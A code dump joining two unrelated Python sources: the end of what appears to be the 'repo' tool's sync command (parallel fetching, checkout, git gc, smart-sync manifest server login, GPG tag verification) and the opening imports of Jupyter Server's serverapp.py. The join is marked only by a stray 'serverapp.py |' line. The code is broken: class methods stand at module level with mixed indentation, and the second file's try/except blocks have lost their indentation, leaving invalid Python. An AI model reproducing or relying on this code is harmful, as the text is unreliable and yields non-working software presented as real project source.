    projects: List of Project objects to fetch.
    opt: Program options returned from optparse.  See _Options().
    err_event: Event set by workers when any fetch fails.

  Returns:
    Set of gitdirs that were fetched successfully.
  """
  fetched = set()
  lock = _threading.Lock()
  pm = Progress('Fetching projects', len(projects),
                always_print_percentage=opt.quiet)

  # Group projects by object directory; each group runs on one worker.
  objdir_project_map = dict()
  for project in projects:
    objdir_project_map.setdefault(project.objdir, []).append(project)

  threads = set()
  sem = _threading.Semaphore(self.jobs)
  for project_list in objdir_project_map.values():
    # Check for any errors before running any more tasks.
    # ...we'll let existing threads finish, though.
    if err_event.is_set() and opt.fail_fast:
      break

    sem.acquire()
    kwargs = dict(opt=opt,
                  projects=project_list,
                  sem=sem,
                  lock=lock,
                  fetched=fetched,
                  pm=pm,
                  err_event=err_event,
                  clone_filter=self.manifest.CloneFilter)
    if self.jobs > 1:
      t = _threading.Thread(target=self._FetchProjectList,
                            kwargs=kwargs)
      # Ensure that Ctrl-C will not freeze the repo process.
      t.daemon = True
      threads.add(t)
      t.start()
    else:
      # Single-job mode: run inline on this thread.
      self._FetchProjectList(**kwargs)

  for t in threads:
    t.join()

  pm.end()
  self._fetch_times.Save()

  if not self.manifest.IsArchive:
    self._GCProjects(projects, opt, err_event)

  return fetched
def _CheckoutWorker(self, opt, sem, project, *args, **kwargs):
  """Main function of the checkout threads.

  Delegates most of the work to _CheckoutOne.

  (The previous docstring was copy-pasted from the fetch path and
  documented a nonexistent `projects` argument.)

  Args:
    opt: Program options returned from optparse.  See _Options().
    sem: We'll release() this semaphore when we exit so that another thread
        can be started up.
    project: Project to check out.
    *args, **kwargs: Remaining arguments to pass to _CheckoutOne. See the
        _CheckoutOne docstring for details.
  """
  try:
    return self._CheckoutOne(opt, project, *args, **kwargs)
  finally:
    sem.release()
def _CheckoutOne(self, opt, project, lock, pm, err_event, err_results):
  """Checkout work tree for one project

  Args:
    opt: Program options returned from optparse.  See _Options().
    project: Project object for the project to checkout.
    lock: Lock for accessing objects that are shared amongst multiple
        _CheckoutWorker() threads.
    pm: Instance of a Project object.  We will call pm.update() (with our
        lock held).
    err_event: We'll set this event in the case of an error (after printing
        out info about the error).
    err_results: A list of strings, paths to git repos where checkout
        failed.

  Returns:
    Whether the fetch was successful.
  """
  # We'll set to true once we've locked the lock.
  did_lock = False

  # Encapsulate everything in a try/except/finally so that:
  # - We always set err_event in the case of an exception.
  # - We always make sure we unlock the lock if we locked it.
  start = time.time()
  syncbuf = SyncBuffer(self.manifest.manifestProject.config,
                       detach_head=opt.detach_head)
  success = False
  try:
    try:
      project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)

      # Lock around all the rest of the code, since printing, updating a set
      # and Progress.update() are not thread safe.
      lock.acquire()
      success = syncbuf.Finish()
      did_lock = True

      if not success:
        err_event.set()
        print('error: Cannot checkout %s' % (project.name),
              file=sys.stderr)
        raise _CheckoutError()

      pm.update(msg=project.name)
    except _CheckoutError:
      # Already reported above; swallow so the worker exits cleanly.
      pass
    except Exception as e:
      print('error: Cannot checkout %s: %s: %s' %
            (project.name, type(e).__name__, str(e)),
            file=sys.stderr)
      err_event.set()
      raise
  finally:
    if did_lock:
      # Record the failing path while we still hold the lock.
      if not success:
        err_results.append(project.relpath)
      lock.release()
    finish = time.time()
    self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
                           start, finish, success)

  return success
def _Checkout(self, all_projects, opt, err_event, err_results):
  """Checkout projects listed in all_projects

  Args:
    all_projects: List of all projects that should be checked out.
    opt: Program options returned from optparse.  See _Options().
    err_event: We'll set this event in the case of an error (after printing
        out info about the error).
    err_results: A list of strings, paths to git repos where checkout
        failed.
  """
  # Perform checkouts in multiple threads when we are using partial clone.
  # Without partial clone, all needed git objects are already downloaded,
  # in this situation it's better to use only one process because the checkout
  # would be mostly disk I/O; with partial clone, the objects are only
  # downloaded when demanded (at checkout time), which is similar to the
  # Sync_NetworkHalf case and parallelism would be helpful.
  if self.manifest.CloneFilter:
    syncjobs = self.jobs
  else:
    syncjobs = 1

  lock = _threading.Lock()
  pm = Progress('Checking out projects', len(all_projects))

  threads = set()
  sem = _threading.Semaphore(syncjobs)

  for project in all_projects:
    # Check for any errors before running any more tasks.
    # ...we'll let existing threads finish, though.
    if err_event.is_set() and opt.fail_fast:
      break

    sem.acquire()
    # Mirror/bare checkouts have no worktree to update; skip them.
    if project.worktree:
      kwargs = dict(opt=opt,
                    sem=sem,
                    project=project,
                    lock=lock,
                    pm=pm,
                    err_event=err_event,
                    err_results=err_results)
      if syncjobs > 1:
        t = _threading.Thread(target=self._CheckoutWorker,
                              kwargs=kwargs)
        # Ensure that Ctrl-C will not freeze the repo process.
        t.daemon = True
        threads.add(t)
        t.start()
      else:
        # Single-job mode: run inline on this thread.
        self._CheckoutWorker(**kwargs)

  for t in threads:
    t.join()

  pm.end()
def _GCProjects(self, projects, opt, err_event):
  """Run `git gc --auto` for the fetched projects, possibly in parallel.

  Shared projects (multiple manifest entries with the same project name)
  must never be pruned: on git 2.7+ the preciousObjects repository
  extension is enabled; on older git, gc.pruneExpire is set to 'never'.

  Args:
    projects: Projects whose bare repositories should be gc'ed.
    opt: Program options returned from optparse.  See _Options().
    err_event: Event set when a gc invocation fails.
  """
  gc_gitdirs = {}
  for project in projects:
    # Make sure pruning never kicks in with shared projects.
    if (not project.use_git_worktrees and
            len(project.manifest.GetProjectsWithName(project.name)) > 1):
      if not opt.quiet:
        print('%s: Shared project %s found, disabling pruning.' %
              (project.relpath, project.name))
      if git_require((2, 7, 0)):
        project.EnableRepositoryExtension('preciousObjects')
      else:
        # This isn't perfect, but it's the best we can do with old git.
        print('%s: WARNING: shared projects are unreliable when using old '
              'versions of git; please upgrade to git-2.7.0+.'
              % (project.relpath,),
              file=sys.stderr)
        project.config.SetString('gc.pruneExpire', 'never')
    # Keyed by gitdir so a shared repository is gc'ed only once.
    gc_gitdirs[project.gitdir] = project.bare_git

  if multiprocessing:
    cpu_count = multiprocessing.cpu_count()
  else:
    cpu_count = 1
  jobs = min(self.jobs, cpu_count)

  if jobs < 2:
    # Not worth spawning threads; gc sequentially.
    for bare_git in gc_gitdirs.values():
      bare_git.gc('--auto')
    return

  # Split the available CPUs between concurrent gc invocations.
  config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}

  threads = set()
  sem = _threading.Semaphore(jobs)

  def GC(bare_git):
    try:
      try:
        bare_git.gc('--auto', config=config)
      except GitError:
        err_event.set()
      except Exception:
        err_event.set()
        raise
    finally:
      sem.release()

  for bare_git in gc_gitdirs.values():
    if err_event.is_set() and opt.fail_fast:
      break
    sem.acquire()
    t = _threading.Thread(target=GC, args=(bare_git,))
    t.daemon = True
    threads.add(t)
    t.start()

  for t in threads:
    t.join()
def _ReloadManifest(self, manifest_name=None):
  """Reload the manifest, optionally overriding it with *manifest_name*."""
  if not manifest_name:
    self.manifest._Unload()
  else:
    # Override calls _Unload already
    self.manifest.Override(manifest_name)
def UpdateProjectList(self, opt):
  """Rewrite .repo/project.list and delete worktrees of removed projects.

  Compares the paths recorded in project.list from the previous sync with
  the projects in the current manifest, deleting working trees that are no
  longer listed, then writes the fresh list back out.

  Args:
    opt: Program options returned from optparse.  See _Options().

  Returns:
    0 on success; 1 if an obsolete worktree could not be deleted.
  """
  new_project_paths = []
  for project in self.GetProjects(None, missing_ok=True):
    if project.relpath:
      new_project_paths.append(project.relpath)
  file_name = 'project.list'
  file_path = os.path.join(self.repodir, file_name)
  old_project_paths = []

  if os.path.exists(file_path):
    with open(file_path, 'r') as fd:
      old_project_paths = fd.read().split('\n')
    # In reversed order, so subfolders are deleted before parent folder.
    for path in sorted(old_project_paths, reverse=True):
      if not path:
        continue
      if path not in new_project_paths:
        # If the path has already been deleted, we don't need to do it
        gitdir = os.path.join(self.manifest.topdir, path, '.git')
        if os.path.exists(gitdir):
          project = Project(
              manifest=self.manifest,
              name=path,
              remote=RemoteSpec('origin'),
              gitdir=gitdir,
              objdir=gitdir,
              # NOTE(review): a worktree checkout leaves .git as a file,
              # which presumably is what isfile() detects here — confirm.
              use_git_worktrees=os.path.isfile(gitdir),
              worktree=os.path.join(self.manifest.topdir, path),
              relpath=path,
              revisionExpr='HEAD',
              revisionId=None,
              groups=None)
          if not project.DeleteWorktree(
                  quiet=opt.quiet,
                  force=opt.force_remove_dirty):
            return 1

  new_project_paths.sort()
  with open(file_path, 'w') as fd:
    fd.write('\n'.join(new_project_paths))
    fd.write('\n')
  return 0
def _SmartSyncSetup(self, opt, smart_sync_manifest_path):
    """Fetch a manifest from the manifest server (-s / -t) and load it.

    Resolves credentials (explicit options first, then ~/.netrc), calls the
    XML-RPC manifest server, writes the returned manifest to
    *smart_sync_manifest_path* and reloads it.

    Returns:
      The basename of the written manifest file.

    Exits the process on any server, I/O, or RPC failure.
    """
    if not self.manifest.manifest_server:
        print('error: cannot smart sync: no manifest server defined in '
              'manifest', file=sys.stderr)
        sys.exit(1)
    manifest_server = self.manifest.manifest_server
    if not opt.quiet:
        print('Using manifest server %s' % manifest_server)
    # Only inject credentials if the URL does not already embed them.
    if '@' not in manifest_server:
        username = None
        password = None
        if opt.manifest_server_username and opt.manifest_server_password:
            username = opt.manifest_server_username
            password = opt.manifest_server_password
        else:
            try:
                info = netrc.netrc()
            except IOError:
                # .netrc file does not exist or could not be opened
                pass
            else:
                try:
                    parse_result = urllib.parse.urlparse(manifest_server)
                    if parse_result.hostname:
                        auth = info.authenticators(parse_result.hostname)
                        if auth:
                            username, _account, password = auth
                        else:
                            print('No credentials found for %s in .netrc'
                                  % parse_result.hostname, file=sys.stderr)
                except netrc.NetrcParseError as e:
                    print('Error parsing .netrc file: %s' % e, file=sys.stderr)
        if (username and password):
            # Splice user:pass into the URL right after the scheme.
            manifest_server = manifest_server.replace('://', '://%s:%s@' %
                                                      (username, password),
                                                      1)
    transport = PersistentTransport(manifest_server)
    if manifest_server.startswith('persistent-'):
        manifest_server = manifest_server[len('persistent-'):]
    try:
        server = xmlrpc.client.Server(manifest_server, transport=transport)
        if opt.smart_sync:
            branch = self._GetBranch()
            # Target selection mirrors the Android build environment variables.
            if 'SYNC_TARGET' in os.environ:
                target = os.environ['SYNC_TARGET']
                [success, manifest_str] = server.GetApprovedManifest(branch, target)
            elif ('TARGET_PRODUCT' in os.environ and
                  'TARGET_BUILD_VARIANT' in os.environ):
                target = '%s-%s' % (os.environ['TARGET_PRODUCT'],
                                    os.environ['TARGET_BUILD_VARIANT'])
                [success, manifest_str] = server.GetApprovedManifest(branch, target)
            else:
                [success, manifest_str] = server.GetApprovedManifest(branch)
        else:
            assert(opt.smart_tag)
            [success, manifest_str] = server.GetManifest(opt.smart_tag)
        if success:
            manifest_name = os.path.basename(smart_sync_manifest_path)
            try:
                with open(smart_sync_manifest_path, 'w') as f:
                    f.write(manifest_str)
            except IOError as e:
                print('error: cannot write manifest to %s:\n%s'
                      % (smart_sync_manifest_path, e),
                      file=sys.stderr)
                sys.exit(1)
            self._ReloadManifest(manifest_name)
        else:
            print('error: manifest server RPC call failed: %s' %
                  manifest_str, file=sys.stderr)
            sys.exit(1)
    except (socket.error, IOError, xmlrpc.client.Fault) as e:
        print('error: cannot connect to manifest server %s:\n%s'
              % (self.manifest.manifest_server, e), file=sys.stderr)
        sys.exit(1)
    except xmlrpc.client.ProtocolError as e:
        print('error: cannot connect to manifest server %s:\n%d %s'
              % (self.manifest.manifest_server, e.errcode, e.errmsg),
              file=sys.stderr)
        sys.exit(1)
    return manifest_name
def _UpdateManifestProject(self, opt, mp, manifest_name):
    """Fetch & update the local manifest project.

    Runs the network half (unless --local-only) and, if the manifest project
    has changes, the local half; reloads the manifest afterwards.  Exits the
    process if the local sync did not finish cleanly.
    """
    if not opt.local_only:
        start = time.time()
        success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose,
                                      current_branch_only=opt.current_branch_only,
                                      force_sync=opt.force_sync,
                                      tags=opt.tags,
                                      optimized_fetch=opt.optimized_fetch,
                                      retry_fetches=opt.retry_fetches,
                                      submodules=self.manifest.HasSubmodules,
                                      clone_filter=self.manifest.CloneFilter)
        finish = time.time()
        self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
                               start, finish, success)
    if mp.HasChanges:
        syncbuf = SyncBuffer(mp.config)
        start = time.time()
        mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
        clean = syncbuf.Finish()
        self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
                               start, time.time(), clean)
        if not clean:
            sys.exit(1)
        self._ReloadManifest(opt.manifest_name)
        # Pick up the manifest's default job count when -j was not given.
        if opt.jobs is None:
            self.jobs = self.manifest.default.sync_j
def ValidateOptions(self, opt, args):
    """Reject mutually-exclusive option combinations via OptionParser.error."""
    if opt.force_broken:
        print('warning: -f/--force-broken is now the default behavior, and the '
              'options are deprecated', file=sys.stderr)
    err = self.OptionParser.error
    # (condition, message) pairs for pairwise-incompatible options.
    incompatible = (
        (opt.network_only and opt.detach_head, 'cannot combine -n and -d'),
        (opt.network_only and opt.local_only, 'cannot combine -n and -l'),
        (opt.manifest_name and opt.smart_sync, 'cannot combine -m and -s'),
        (opt.manifest_name and opt.smart_tag, 'cannot combine -m and -t'),
    )
    for bad, message in incompatible:
        if bad:
            err(message)
    if opt.manifest_server_username or opt.manifest_server_password:
        if not (opt.smart_sync or opt.smart_tag):
            err('-u and -p may only be combined with -s or -t')
        if None in (opt.manifest_server_username, opt.manifest_server_password):
            err('both -u and -p must be given')
def Execute(self, opt, args):
    """Top-level driver for `repo sync`.

    Phases: normalize options, optionally obtain a smart-sync manifest,
    update the repo/manifest projects, handle GITC clients, fetch all
    projects over the network (unless --local-only), then check out working
    trees (unless --network-only).  Exits non-zero on any recorded error.
    """
    if opt.jobs:
        self.jobs = opt.jobs
    if self.jobs > 1:
        # Cap parallelism by available file descriptors (~3 fds per job,
        # keeping 5 in reserve).
        soft_limit, _ = _rlimit_nofile()
        self.jobs = min(self.jobs, (soft_limit - 5) // 3)
    # opt.output_mode is tri-state: False => quiet, True => verbose, None => default.
    opt.quiet = opt.output_mode is False
    opt.verbose = opt.output_mode is True
    if opt.manifest_name:
        self.manifest.Override(opt.manifest_name)
    manifest_name = opt.manifest_name
    smart_sync_manifest_path = os.path.join(
        self.manifest.manifestProject.worktree, 'smart_sync_override.xml')
    if opt.clone_bundle is None:
        opt.clone_bundle = self.manifest.CloneBundle
    if opt.smart_sync or opt.smart_tag:
        manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path)
    else:
        # Not smart-syncing: clear any stale override manifest from a prior run.
        if os.path.isfile(smart_sync_manifest_path):
            try:
                platform_utils.remove(smart_sync_manifest_path)
            except OSError as e:
                print('error: failed to remove existing smart sync override manifest: %s' %
                      e, file=sys.stderr)
    # Shared flag: any worker thread sets this on failure.
    err_event = _threading.Event()
    rp = self.manifest.repoProject
    rp.PreSync()
    cb = rp.CurrentBranch
    if cb:
        base = rp.GetBranch(cb).merge
        if not base or not base.startswith('refs/heads/'):
            print('warning: repo is not tracking a remote branch, so it will not '
                  'receive updates; run `repo init --repo-rev=stable` to fix.',
                  file=sys.stderr)
    mp = self.manifest.manifestProject
    mp.PreSync()
    if opt.repo_upgraded:
        _PostRepoUpgrade(self.manifest, quiet=opt.quiet)
    if not opt.mp_update:
        print('Skipping update of local manifest project.')
    else:
        self._UpdateManifestProject(opt, mp, manifest_name)
    if (opt.use_superproject or
        self.manifest.manifestProject.config.GetBoolean(
            'repo.superproject')):
        manifest_name = self._UpdateProjectsRevisionId(opt, args)
    if self.gitc_manifest:
        # Partition projects into GITC-managed vs locally-opened ones.
        gitc_manifest_projects = self.GetProjects(args,
                                                  missing_ok=True)
        gitc_projects = []
        opened_projects = []
        for project in gitc_manifest_projects:
            if project.relpath in self.gitc_manifest.paths and \
               self.gitc_manifest.paths[project.relpath].old_revision:
                opened_projects.append(project.relpath)
            else:
                gitc_projects.append(project.relpath)
        if not args:
            gitc_projects = None
        if gitc_projects != [] and not opt.local_only:
            print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
            manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
            if manifest_name:
                manifest.Override(manifest_name)
            else:
                manifest.Override(self.manifest.manifestFile)
            gitc_utils.generate_gitc_manifest(self.gitc_manifest,
                                              manifest,
                                              gitc_projects)
            print('GITC client successfully synced.')
        # The opened projects need to be synced as normal, therefore we
        # generate a new args list to represent the opened projects.
        # TODO: make this more reliable -- if there's a project name/path overlap,
        # this may choose the wrong project.
        args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
                for path in opened_projects]
        if not args:
            return
    all_projects = self.GetProjects(args,
                                    missing_ok=True,
                                    submodules_ok=opt.fetch_submodules)
    err_network_sync = False
    err_update_projects = False
    err_checkout = False
    self._fetch_times = _FetchTimes(self.manifest)
    if not opt.local_only:
        to_fetch = []
        now = time.time()
        # Refetch the repo project itself at most once a day.
        if _ONE_DAY_S <= (now - rp.LastFetch):
            to_fetch.append(rp)
        to_fetch.extend(all_projects)
        # Slowest-first ordering keeps the long fetches from straggling.
        to_fetch.sort(key=self._fetch_times.Get, reverse=True)
        fetched = self._Fetch(to_fetch, opt, err_event)
        _PostRepoFetch(rp, opt.repo_verify)
        if opt.network_only:
            # bail out now; the rest touches the working tree
            if err_event.is_set():
                print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr)
                sys.exit(1)
            return
        # Iteratively fetch missing and/or nested unregistered submodules
        previously_missing_set = set()
        while True:
            self._ReloadManifest(manifest_name)
            all_projects = self.GetProjects(args,
                                            missing_ok=True,
                                            submodules_ok=opt.fetch_submodules)
            missing = []
            for project in all_projects:
                if project.gitdir not in fetched:
                    missing.append(project)
            if not missing:
                break
            # Stop us from non-stopped fetching actually-missing repos: If set of
            # missing repos has not been changed from last fetch, we break.
            missing_set = set(p.name for p in missing)
            if previously_missing_set == missing_set:
                break
            previously_missing_set = missing_set
            fetched.update(self._Fetch(missing, opt, err_event))
        # If we saw an error, exit with code 1 so that other scripts can check.
        if err_event.is_set():
            err_network_sync = True
            if opt.fail_fast:
                print('\nerror: Exited sync due to fetch errors.\n'
                      'Local checkouts *not* updated. Resolve network issues & '
                      'retry.\n'
                      '`repo sync -l` will update some local checkouts.',
                      file=sys.stderr)
                sys.exit(1)
    if self.manifest.IsMirror or self.manifest.IsArchive:
        # bail out now, we have no working tree
        return
    if self.UpdateProjectList(opt):
        err_event.set()
        err_update_projects = True
        if opt.fail_fast:
            print('\nerror: Local checkouts *not* updated.', file=sys.stderr)
            sys.exit(1)
    err_results = []
    self._Checkout(all_projects, opt, err_event, err_results)
    if err_event.is_set():
        err_checkout = True
        # NB: We don't exit here because this is the last step.
    # If there's a notice that's supposed to print at the end of the sync, print
    # it now...
    if self.manifest.notice:
        print(self.manifest.notice)
    # If we saw an error, exit with code 1 so that other scripts can check.
    if err_event.is_set():
        print('\nerror: Unable to fully sync the tree.', file=sys.stderr)
        if err_network_sync:
            print('error: Downloading network changes failed.', file=sys.stderr)
        if err_update_projects:
            print('error: Updating local project lists failed.', file=sys.stderr)
        if err_checkout:
            print('error: Checking out local projects failed.', file=sys.stderr)
            if err_results:
                print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr)
        print('Try re-running with "-j1 --fail-fast" to exit at the first error.',
              file=sys.stderr)
        sys.exit(1)
    if not opt.quiet:
        print('repo sync has finished successfully.')
def _PostRepoUpgrade(manifest, quiet=False):
    """Run post-upgrade fixups: GnuPG setup plus per-project upgrade hooks."""
    wrapper = Wrapper()
    if wrapper.NeedSetupGnuPG():
        wrapper.SetupGnuPG(quiet)
    # Only projects that exist on disk receive the upgrade hook.
    for proj in (p for p in manifest.projects if p.Exists):
        proj.PostRepoUpgrade()
def _PostRepoFetch(rp, repo_verify=True, verbose=False):
    """Apply a freshly fetched repo-tool update, restarting repo if needed.

    Raises RepoChangedException after a successful local update so the
    caller can re-exec with the new version.
    """
    if not rp.HasChanges:
        if verbose:
            print('repo version %s is current' % rp.work_git.describe(HEAD),
                  file=sys.stderr)
        return
    print('info: A new version of repo is available', file=sys.stderr)
    print(file=sys.stderr)
    if repo_verify and not _VerifyTag(rp):
        print('warning: Skipped upgrade to unverified version', file=sys.stderr)
        return
    syncbuf = SyncBuffer(rp.config)
    rp.Sync_LocalHalf(syncbuf)
    if not syncbuf.Finish():
        sys.exit(1)
    print('info: Restarting repo with latest version', file=sys.stderr)
    raise RepoChangedException(['--repo-upgraded'])
def _VerifyTag(project):
    """Check the GPG signature on the tag the project is pinned to.

    Returns:
      True if the tag verifies (or verification must be skipped because
      GnuPG was never set up); False if the revision is not an exact signed
      tag or `git tag -v` fails.
    """
    gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
    if not os.path.exists(gpg_dir):
        # `repo init` never set up GnuPG; skip verification rather than block.
        # (Fixed: the original message ended with a stray '"""'.)
        print('warning: GnuPG was not available during last "repo init"\n'
              'warning: Cannot automatically authenticate repo.',
              file=sys.stderr)
        return True
    try:
        cur = project.bare_git.describe(project.GetRevisionId())
    except GitError:
        cur = None
    # describe output of the form "<tag>-<n>-g<hash>" means we are NOT exactly
    # on a tag, so there is no signature to verify.
    if not cur \
            or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
        rev = project.revisionExpr
        if rev.startswith(R_HEADS):
            rev = rev[len(R_HEADS):]
        print(file=sys.stderr)
        print("warning: project '%s' branch '%s' is not signed"
              % (project.name, rev), file=sys.stderr)
        return False
    env = os.environ.copy()
    env['GIT_DIR'] = project.gitdir
    env['GNUPGHOME'] = gpg_dir
    cmd = [GIT, 'tag', '-v', cur]
    result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                            env=env, check=False)
    if result.returncode:
        print(file=sys.stderr)
        print(result.stdout, file=sys.stderr)
        print(file=sys.stderr)
        return False
    return True
class _FetchTimes(object):
    """Per-project fetch-duration estimates (EWMA), persisted as JSON."""

    _ALPHA = 0.5

    def __init__(self, manifest):
        self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
        self._times = None
        self._seen = set()

    def Get(self, project):
        """Return the estimated fetch time for *project* (default: one day)."""
        self._Load()
        return self._times.get(project.name, _ONE_DAY_S)

    def Set(self, project, t):
        """Fold a new measured duration into the project's running estimate."""
        self._Load()
        name = project.name
        prior = self._times.get(name, t)
        self._seen.add(name)
        # Exponentially-weighted moving average of old and new timings.
        self._times[name] = self._ALPHA * t + (1 - self._ALPHA) * prior

    def _Load(self):
        if self._times is not None:
            return
        try:
            with open(self._path) as f:
                self._times = json.load(f)
        except (IOError, ValueError):
            # Unreadable or corrupt cache: discard it and start fresh.
            try:
                platform_utils.remove(self._path)
            except OSError:
                pass
            self._times = {}

    def Save(self):
        """Persist the table, first dropping projects not seen this run."""
        if self._times is None:
            return
        for name in [n for n in self._times if n not in self._seen]:
            del self._times[name]
        try:
            with open(self._path, 'w') as f:
                json.dump(self._times, f, indent=2)
        except (IOError, TypeError):
            try:
                platform_utils.remove(self._path)
            except OSError:
                pass
# This is a replacement for xmlrpc.client.Transport using urllib.request
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport, the real url
# is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
    """xmlrpc Transport bound to one URL, with cookie and proxy support.

    The real URL is supplied at construction time; the ``host`` passed to
    request() is ignored in favor of it.
    """

    def __init__(self, orig_host):
        # The full original URL (possibly with a persistent-http[s] scheme).
        self.orig_host = orig_host

    def request(self, host, handler, request_body, verbose=False):
        """Issue one XML-RPC POST and return the parsed response."""
        with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
            # Python doesn't understand cookies with the #HttpOnly_ prefix
            # Since we're only using them for HTTP, copy the file temporarily,
            # stripping those prefixes away.
            if cookiefile:
                tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
                tmpcookiefile.write("# HTTP Cookie File")
                try:
                    with open(cookiefile) as f:
                        for line in f:
                            if line.startswith("#HttpOnly_"):
                                line = line[len("#HttpOnly_"):]
                            tmpcookiefile.write(line)
                    tmpcookiefile.flush()
                    cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
                    try:
                        cookiejar.load()
                    except cookielib.LoadError:
                        # Unparseable cookie file: fall back to an empty jar.
                        cookiejar = cookielib.CookieJar()
                finally:
                    tmpcookiefile.close()
            else:
                cookiejar = cookielib.CookieJar()
            proxyhandler = urllib.request.ProxyHandler
            if proxy:
                proxyhandler = urllib.request.ProxyHandler({
                    "http": proxy,
                    "https": proxy})
            opener = urllib.request.build_opener(
                urllib.request.HTTPCookieProcessor(cookiejar),
                proxyhandler)
            url = urllib.parse.urljoin(self.orig_host, handler)
            parse_results = urllib.parse.urlparse(url)
            # Map the custom persistent-http[s] schemes onto real ones.
            scheme = parse_results.scheme
            if scheme == 'persistent-http':
                scheme = 'http'
            if scheme == 'persistent-https':
                # If we're proxying through persistent-https, use http. The
                # proxy itself will do the https.
                if proxy:
                    scheme = 'http'
                else:
                    scheme = 'https'
            # Parse out any authentication information using the base class
            host, extra_headers, _ = self.get_host_info(parse_results.netloc)
            url = urllib.parse.urlunparse((
                scheme,
                host,
                parse_results.path,
                parse_results.params,
                parse_results.query,
                parse_results.fragment))
            request = urllib.request.Request(url, request_body)
            if extra_headers is not None:
                for (name, header) in extra_headers:
                    request.add_header(name, header)
            request.add_header('Content-Type', 'text/xml')
            try:
                response = opener.open(request)
            except urllib.error.HTTPError as e:
                if e.code == 501:
                    # We may have been redirected through a login process
                    # but our POST turned into a GET. Retry.
                    response = opener.open(request)
                else:
                    raise
            # Stream the body into the XML-RPC parser in 1 KiB chunks.
            p, u = xmlrpc.client.getparser()
            while 1:
                data = response.read(1024)
                if not data:
                    break
                p.feed(data)
            p.close()
            return u.close()

    def close(self):
        # Nothing persistent to tear down; connections are per-request.
        pass
|
serverapp.py | # coding: utf-8
"""A tornado based Jupyter server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import binascii
import datetime
import errno
import gettext
import hashlib
import hmac
import inspect
import io
import ipaddress
import json
import logging
import mimetypes
import os
import pathlib
import random
import re
import select
import signal
import socket
import stat
import sys
import threading
import time
import urllib
import webbrowser
from base64 import encodebytes
try:
import resource
except ImportError:
# Windows
resource = None
from jinja2 import Environment, FileSystemLoader
from jupyter_core.paths import secure_write
from jupyter_server.transutils import trans, _i18n
from jupyter_server.utils import run_sync_in_loop, urljoin, pathname2url
# the minimum viable tornado version: needs to be kept in sync with setup.py
MIN_TORNADO = (6, 1, 0)
try:
import tornado
assert tornado.version_info >= MIN_TORNADO
except (ImportError, AttributeError, AssertionError) as e: # pragma: no cover
raise ImportError(_i18n("The Jupyter Server requires tornado >=%s.%s.%s") % MIN_TORNADO) from e
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith("win"):
from tornado.netutil import bind_unix_socket
from jupyter_server import (
DEFAULT_JUPYTER_SERVER_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from jupyter_server.base.handlers import MainHandler, RedirectWithParams, Template404
from jupyter_server.log import log_request
from jupyter_server.services.kernels.kernelmanager import (
MappingKernelManager,
AsyncMappingKernelManager,
)
from jupyter_server.services.config import ConfigManager
from jupyter_server.services.contents.manager import AsyncContentsManager, ContentsManager
from jupyter_server.services.contents.filemanager import (
AsyncFileContentsManager,
FileContentsManager,
)
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.services.sessions.sessionmanager import SessionManager
from jupyter_server.gateway.managers import (
GatewayMappingKernelManager,
GatewayKernelSpecManager,
GatewaySessionManager,
GatewayClient,
)
from jupyter_server.auth.login import LoginHandler
from jupyter_server.auth.logout import LogoutHandler
from jupyter_server.base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp,
base_flags,
base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any,
Dict,
Unicode,
Integer,
List,
Bool,
Bytes,
Instance,
TraitError,
Type,
Float,
observe,
default,
validate,
)
from jupyter_core.paths import jupyter_runtime_dir
from jupyter_server._sysinfo import get_sys_info
from jupyter_server._tz import utcnow
from jupyter_server.utils import (
url_path_join,
check_pid,
url_escape,
pathname2url,
unix_socket_in_use,
urlencode_unix_socket_path,
fetch,
)
from jupyter_server.extension.serverextension import ServerExtensionApp
from jupyter_server.extension.manager import ExtensionManager
from jupyter_server.extension.config import ExtensionConfigManager
from jupyter_server.traittypes import TypeFromClasses
# Tolerate missing terminado package.
try:
from jupyter_server.terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
# -----------------------------------------------------------------------------
# Module globals
# -----------------------------------------------------------------------------
# Example invocations shown in --help output.
_examples = """
jupyter server # start the server
jupyter server --certfile=mycert.pem # use SSL/TLS certificate
jupyter server password # enter a password to protect the server
"""

# Maps each built-in service name to the list of modules whose
# ``default_handlers`` implement it.  ``auth`` is None because its
# login/logout handlers are wired up specially in
# ServerWebApplication.init_handlers.
JUPYTER_SERVICE_HANDLERS = dict(
    auth=None,
    api=["jupyter_server.services.api.handlers"],
    config=["jupyter_server.services.config.handlers"],
    contents=["jupyter_server.services.contents.handlers"],
    files=["jupyter_server.files.handlers"],
    kernels=["jupyter_server.services.kernels.handlers"],
    kernelspecs=[
        "jupyter_server.kernelspecs.handlers",
